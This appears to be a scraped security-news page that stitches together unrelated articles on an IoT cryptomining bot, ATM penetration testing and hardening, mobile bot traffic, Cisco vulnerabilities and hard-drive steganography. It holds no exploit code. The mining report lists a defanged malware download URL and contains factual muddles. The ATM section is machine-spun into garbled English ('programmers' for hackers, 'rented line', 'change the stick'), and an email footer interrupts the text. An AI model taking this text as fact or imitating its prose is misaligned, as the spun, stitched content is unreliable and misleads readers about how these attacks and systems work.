Author: Suman Raj

Newly discovered cryptocurrency mining bot targeting the Internet of Things (IoT) devices which contain SSH service and IoT-related ports, including 22, 2222, and 502.

Cryptocurrency-mining malware consumes the system resources and utilizes them for mining cryptocurrencies without user permissions.

This crypto-mining attack will work for all the connected devices and servers that running under SSH service.

SSH service provides the secure connection for IoT (Internet of Things) refers to devices that are connected to the Internet.

Attackers using Various social Engineering tricks to compromise victims and Monero and Ethereum coins to gain huge profits using another device.

The uncovered bot mainly searches for the device that running with open Remote Desktop Protocol (RDP) port and taking advantages of vulnerable devices and run the script that download & install the malware.

Botnet Infection process on SSH Service

Initially, botnet host the malicious script using specific website and the script will download the files from hxxps://www[.]yiluzhuanqian[.]com/soft/Linux/yilu_2_[.]tgz and save it into the temp folder.

This is one of the widely using exploitation technique against Linux-based servers and this bot is able to load miners on Linux.

Script downloaded site appears to be financial scam site and the attacker using sophisticated techniques that helps switch to another domain to continue operations if the link is blocked at any cost.

So once the downloaded malicious script will be executed then it first checks the internet connectivity the connect to Baindu.com after that, it checks the OS that running on the target and it specifically targets the Linux based operating system.

The huge page and memlock are also set up helps to enhance the more computational power to mining the cryptocurrency.

Once those are set up, the script downloads the miner, disguised as a download of a libhwloc4library and this miner using some persistence mechanism to keep running the miner even after rebooting the computer.

According to Trend micro report, The file cmd.txt lists commands used to run the “mservice” binary with parameters, which then installs the actual miner, “YiluzhuanqianSer.” (Note that the miner is related to the potential scam site domain.Apart from this a conf.json file contains e web shell/backdoor and the additional directories includes two binaries and even a cmd.txt file that contains commands used to run the miner.

This type of mining operation that targets connected devices for profit is not the first of its kind. Moreover, security incidents that make use of bots to target IoT devices have made headlines on several occasions Trend Micro said.

ATM Penetration testing, Hackers have found different approaches to hack into the ATM machines. Programmers are not restricting themselves to physical assaults, for example, money/card catching, skimming, and so forth they are investigating better approaches to hack ATM programming.

An ATM is a machine that empowers the clients to perform keeping money exchange without setting off to the bank.

Utilizing an ATM, a client can pull back or store the money, get to the bank store or credit account, pay the bills, change the stick, redesign the individual data, and so on. Since the ATM machine manages money, it has turned into a high need focus for programmers and burglars.

In this article, we will perceive how do an ATM functions, security arrangements used to secure the ATMs, diverse sorts of infiltration testing to break down ATM security and a portion of the security best practices which can be utilized to evade ATM hack.

Also Read ATM Black box attacks – ATM Jackpotting

ATM Work Function :

Most of the ATMs have 2 input and 4 output. The card reader and keypad are input whereas a screen, receipt printer, cash dispenser, and the speaker are output.

There are for the most part two sorts of ATM’s which vary as indicated by the way they work. They can be called as

1.Rented line ATM
2.Dial-up ATM machines

Any ATM machine needs an information terminal with two data sources and four yield gadgets. Obviously, for this to happen there ought to likewise be the accessibility of a host processor. The host processor is important so that the ATM can interface furthermore speak with the individual asking for the money. The Internet Service Provider (ISP) additionally assumes an essential part in this activity. They go about as the passage to the halfway systems furthermore the bank PC.

Image Credit : HowstuffWorks

A rented line ATM machine has a 4-wire, indicate point committed phone line which assists in associating it with the host processor. These sorts of machines are favored in spots where the client volume is high. They are viewed as top of the line and the working expenses of this sort of a machine is high.

The dial-up ATM machines just has an ordinary telephone line with a modem and a toll free number. As these are typical associations their underlying establishment cost is less and their working costs just turn into a small amount of that of a rented line ATM.

The host is primarily claimed by the bank. It can likewise be claimed by an ISP. On the off chance that the host is possessed by the bank just machines that work for that specific bank will be upheld.

Also Read Undetectable ATM “Shimmers” Hacker’s Latest Tool for Steal your Chip Based Card Details

ATM BPT style penetration testing

Security professionals perform advanced penetration tests on automated teller machine (ATM) solutions in the financial sector. In most cases, serious security flaws are identified in the ATM configurations and associated processes.

ATMs test with our ‘Business Penetration Test’ (BPT) methodology, which simulates real attacks on ATM solutions. This includes carefully designed targeted attacks, which combines physical, logical and optionally social engineering attack vectors.

ATM security is often considered a complex area by IT security managers, who tend to focus more on the physical risks and less on the logical weaknesses in the operating system and application layer.

Meanwhile, ATM security is a business area that often lacks holistic security assessments. Our ATM tests are based on this belief, and seek to paint a holistic ) picture of your ATM environment.

Physical controls

Many banks rely heavily on the assumption that physical access to their ATM solutions is effectively restricted. In the meantime repeated, illustrates how little effort is often required to gain unauthorized access to the ATM CPU, which controls the user interface and transaction device.

Logical controls

With physical access to the ATM CPU, authentication mechanisms can be bypassed to gain unauthorized access to the ATM platform.

With this access, an attacker may be able to steal credit card data that is stored in file systems or memory, without ever alerting the bank. Furthermore, experts able to demonstrate, this unauthorized access can be expanded from the ATM to the bank’s network and back-end servers by using the compromised ATM as an attack platform.

ATM solution management processes associated with third party service providers and application development vendors are often the golden key for an attacker, and can be included in the scope of our test to identify logical weaknesses in trust relationships that an attacker can exploit to compromise an ATM.

ATM ecosystem

An ATM solution and network form a complex ecosystem that consists of different vendors and responsible agents, both internal and external to the banking organization.

Due to the complexity of this ecosystem with its distributed roles and responsibilities that cross organizational boundaries, the areas associated with security risk are often overlooked. The ATM application itself, with its software updates, operating system patches, platform hardening, and networks, is often vulnerable to attacks.

These attacks are not necessarily sophisticated and often not included in standard penetration tests.

Security Best Practices to be followed for ATM

The banks can implement security best practices to reduce the attack surface for the attacker. This section can be categories into three categories:

1.Protection against physical attacks:

• Detection and protection against Card skimming.
• Detection and protection against card/ cash trapping.
• Detection against keypad tampering.
• Mirror and pin shield to identify and prevent shoulder surfing attack.
• Implementing a DVSS camera inbuilt in the ATM to capture facial features of the user along with transaction details and timestamp.
• Vault protection against fire, explosion, etc.
• Lock protection again unauthorized access to banknotes or bills.
• Electric power point and network point protection.
• Disabling unused network and electric port.
• The ATM must be grouted on the floor to secure against threats related to the robbery. ATM can be implemented with shock sensor to identify the impact and movement of ATM machine.
• Implementation of CCTV camera. The presence of security guard.

2 . Protection against logical attacks:

• Protection against unauthorized booting by setting non-guessable boot and BIOS password. Most of ATM have default boot password configured.
• Protection against USB and unauthorized hard disk access.
• OS hardening and latest patch.
• Whitelisting the application, services, and process on ATM.
• Running ATM with least privilege user. Need to know and need to have approach.
• File integrity checks.
• Securing the transaction logs.
• Use of secure channel for the communication and transaction.
• Configure security best practices in ATM application.
• Antivirus protection.
• ATM network segregation with other networks.
• Protection against Malware like tyupkin, ploutus, etc.

3 . Protection against fraud attacks:

• Implementation of geo-blocking. In this implementation, the card can only be used in originating country or region. The user has to take permission to use the card outside the originating country.
• Implementation of chip and pin based card to mitigate copied and skimming card based attack.
• Implementing a behavior mentoring which detects the unusual transaction in term of the amount, place of transaction, frequency of transaction, etc.

Assessment of ATM Security Solution installed in the ATM:

ATM security solutions

Most of the ATMs run on Windows XP and 7. Patching individual ATM is a quite complex process. Since Windows XP is no longer supported by Microsoft, many ATM vendor uses security solution to mitigate the threats related to ATM attacks such as Malware-based attacks, OS-level vulnerabilities. These security solutions allow the ATM application to run in very restrictive environment with limited services and processes in the back end. Two of such security solutions are Mcafee Solidcore and Phoenix Vista ATM.

Mcafee Solidcore:

McAfee Application Control blocks unauthorized executables on servers, corporate desktops, and fixed-function devices. Using a dynamic trust model and innovative security features such as local and global reputation intelligence, real-time behavioral analytics, and auto-immunization of endpoints, it immediately thwarts advanced persistent threats—without requiring labor-intensive list management or signature updates.

• Complete protection from unwanted applications with coverage of executable files, libraries, drivers, Java apps, ActiveX controls, scripts, and specialty code.
• Flexibility for desktop users and server admins with self-approval and auto-approval based on application rating.
• Viable security for fixed-function, legacy, and modern systems.
• Patch cycle reduction and advanced memory protection.
• Centralized, integrated management via McAfee ePolicy Orchestrator.

Phoenix Vista ATM:

Phoenix Vista ATM is a product of Phoenix Interactive Design Inc .This solution integrates with the ATM application itself. This application works on file integrity check where any modification/tampering with the application related critical file will result in a system shutdown. This disallows any unauthorized program to modify the application specific file.

XFS (extensions for Financial Services) provides a client-server architecture for financial applications on the Microsoft Windows platform, especially peripheral devices such as ATM’s which are unique to the financial industry. It is an international standard promoted by the European Committee for Standardization (known by the acronym CEN, hence CEN/XFS). XFS provides a common API for accessing and manipulating various financial services devices regardless of the manufacturer.

Vista ATM communicates with the XFS layer which gives commands to the hardware like cash dispenser of the ATM to dispense the cash. Any unauthorized modification in XFS files will trigger the Vista ATM application to restart the machine forcefully. The machine restarts 4-5 times, and after that, it goes into maintenance mode which does not allow the user to perform any transaction.

Distil Networks analyzed over 100 million mobile devices on its networks. The findings suggest that sophisticated cybercriminals and bot operators now implement a new technique—leveraging mobile devices – to avoid detection and execute a number of nefarious acts. At this time, 5.8 percent of all mobile devices across six major cellular networks are used in such automated attacks and represent eight percent of all bad bot traffic.

This bad bot traffic is purposefully deployed against any business with a web presence to carry out acts that include web scraping, brute force attacks, competitive data mining, online fraud, account hijacking, data theft, spam and digital ad fraud.

Uncovered by the Distil Research Lab, the data reveals a new method by which perpetrators connect through cellular gateways to target a large variety of websites and apps simultaneously. Cellular gateways handle a huge volume of requests per minute, many of which are legitimate, making it difficult to identify and block criminal ones.

Within some cellular carriers, a single IP address can cater to more than 4,000 devices per day, making cellular traffic an ideal location for bots to remain undetectable. As mobile devices move through different gateways, (based on device owners changing location throughout the day,) bots effectively change identities to make detection even more difficult.

Mobile bots by the numbers:

• Sample size: Over 100 million devices
• Number of mobile carriers researched: Six
• Percentage of mobile ISP gateways used in bad bot attacks: 44 percent
• Percentage of total bad bot traffic deriving from mobile devices on cellular networks: 8 percent
• Percentage of mobile devices making bad bot requests on cellular networks: 5.8 percent
• Average number of bad bot requests by each device per day: 50.

Mobile is the new frontier for bot operators, as they can perform highly advanced attacks while remaining hidden in plain sight,” said Rami Essaid, chief product and strategy officer at Distil Networks. “Whether inadvertently downloaded through an email attachment, or embedded in a seemingly legitimate app, millions of consumers unknowingly carry malware on their devices that allows cybercriminals to conduct bot attacks, abuse and fraud. We have seen bot operators develop and enhance their techniques throughout the years, but the threat to mobile devices is real and growing, and can have detrimental consequences.

Cisco has released security updates to address a bucketload of vulnerabilities affecting multiple products, including 24 critical and high-severity flaws found in many of its switches, next generation firewalls and security appliances.

Those vulnerabilities are present in the Cisco NX-OS Software, which enables network automation and programmatical provisioning and configuration of the devices via APIs, and Cisco FXOS (Firepower eXtensible Operating System).

“Successful exploitation of the vulnerabilities could allow an attacker to gain unauthorized access to an affected device, gain elevated privileges for an affected device, execute arbitrary code, execute arbitrary commands, gain access to sensitive information, or cause a denial of service (DoS) condition on an affected device,” the company explained.

They can be exploited via specially crafted packets (HTTP or HTTPS, Cisco Fabric Services, SNMP, IGMP) and messages (Cisco Discovery Protocol and BGP update messages).

Twelve of the vulnerabilities affect both Cisco FXOS Software and Cisco NX-OS Software and the remaining vulnerabilities affect only Cisco NX-OS Software. None of the vulnerabilities affect Cisco IOS Software or Cisco IOS XE Software.

There are no workarounds for the vulnerabilities, so administrators should implement the offered updates.

Virus-free. www.avg.com

GOOD news for spies. There is now a way to hide data on a hard drive without using encryption. Instead of using a cipher to scramble text, the method involves manipulating the location of data fragments.

The inventors say their method makes it possible to encode a 20-megabyte message on a 160-gigabyte portable hard drive. It hides data so well that its existence would be “unreasonably complex” to detect, they say.

Encryption should sometimes be avoided, says Hassan Khan at the University of Southern California in Los Angeles, because the gobbledegook it creates is a dead giveaway: it shows someone might have something to hide. That could spell disaster for someone trying to smuggle information out of a repressive country.

So “steganography”, hiding data in plain sight, is coming to the fore. Normally, data intended to be secret is added to the pixels in digital images, or used to change the transmission timing of internet packets. But these techniques are well known and easily detected, says Khan. So, with colleagues at the National University of Science and Technology in Islamabad, Pakistan, he has developed an alternative.

Their technique exploits the way hard drives store file data in numerous small chunks, called clusters. The operating system stores these clusters all over the disc, wherever there is free space between fragments of other files.

Khan and his colleagues have written software that ensures clusters of a file, rather than being positioned at the whim of the disc drive controller chip, as is usually the case, are positioned according to a code. All the person at the other end needs to know is which file’s cluster positions have been encoded.

The code depends on whether sequential clusters in a file are situated adjacent to each other on the hard disc or not. If they are adjacent, this corresponds to a binary 1 in the secret message. If sequential clusters are stored in different places on the disc, this encodes a binary 0 (Computers and Security, DOI: 10.1016/j.cose.2010.10.005). The recipient then uses the same software to tell them the file’s cluster positions, and hence the message. The researchers intend to make their software open source.

“An investigator can’t tell the cluster fragmentation pattern is intentional- it looks like what you’d get after addition and deletion of files over time,” says Khan. Tests show the technique works, as long as none of the files on the hard disc are modified before handover.

“The real strength of this technique is that even a completely full drive can still have secret data added to it – simply by rearranging the clusters,” adds Khan.

Others are impressed with the technique but see limitations.

“This type of steganography could be used by spies, police or informants – but the risk is that it requires direct contact to physically exchange the USB device containing the secret data,” says Wojciech Mazurcyk, a steganographer at Warsaw University of Technology in Poland. “So it lacks the flexibility of internet steganography. Once you embed the secret data on the disk it is not easy to modify it.”

But won’t making the covert hard disk software open source – as the group plans – encourage its use by criminals and terror groups?

“It’s how security vulnerability disclosure works,” says Khan. “We have identified that this is possible. Now security agencies can devise techniques to detect it.” He adds that his team have had no issues with either US or Pakistani security agencies over their development of this secret medium – despite current political tensions between the two nations.

“The use of steganographic techniques like this is likely to increase,” says Fred Piper, director of information security at Royal Holloway, University of London. “Eavesdroppers can learn much from the fact that somebody is encrypting a message.”